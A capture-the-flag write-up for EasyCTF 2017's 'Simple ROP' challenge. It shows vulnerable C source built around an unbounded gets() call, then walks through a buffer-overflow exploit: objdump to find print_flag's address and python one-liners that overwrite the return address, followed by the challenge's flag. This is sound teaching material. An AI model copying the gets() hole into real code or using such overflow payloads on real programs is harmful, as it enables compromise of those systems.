Rating:
# Simple ROP - 120 Points
Read flag.txt
[Source](https://raw.githubusercontent.com/EasyCTF/easyctf-2017-problems/master/simple-rop/simple-rop.c)
[Binary](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/simple-rop/simple-rop?raw=true)
### Solution
###### Writeup by VoidMercy from phsst
We were given a binary and it's source code.
```
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
void print_flag();
void what_did_you_say();
int main(int argc, char* argv[])
{
gid_t gid = getegid();
setresgid(gid, gid, gid);
what_did_you_say();
return 0;
}
void print_flag()
{
system("cat flag.txt");
}
void what_did_you_say()
{
char buff[64];
gets(buff);
printf("You said: %s\n", buff);
}
```
As the problem name suggests, this is a problem that uses ROP. We can see that we have to call the function print_flag() to get the flag, so we first get the address of this function with:
>objdump -d simplerop | grep "print_flag"
We find the address of print_flag to be: 0x804851a
Then, we have to find out the number of characters until we gain control of eip through the return address. Afterwards we append the address of print_flag() in little endian order (reversed order in chunks of 2 bytes), then pipe the input through python (to print the non printable ascii characters).
```
python -c 'print "A"*64+"\x1a\x85\x04\x08"' | ./simple-rop #NO SEG FAULT, NOT ENOUGH CHARACTERS
python -c 'print "A"*76+"\x1a\x85\x04\x08"' | ./simple-rop #GOT THE FLAG! 76 IS A PRETTY COMMON SIZE FOR AN ARRAY OF 64 CHARS
```
## Flag
>easyctf{r0p_7o_v1ct0ry}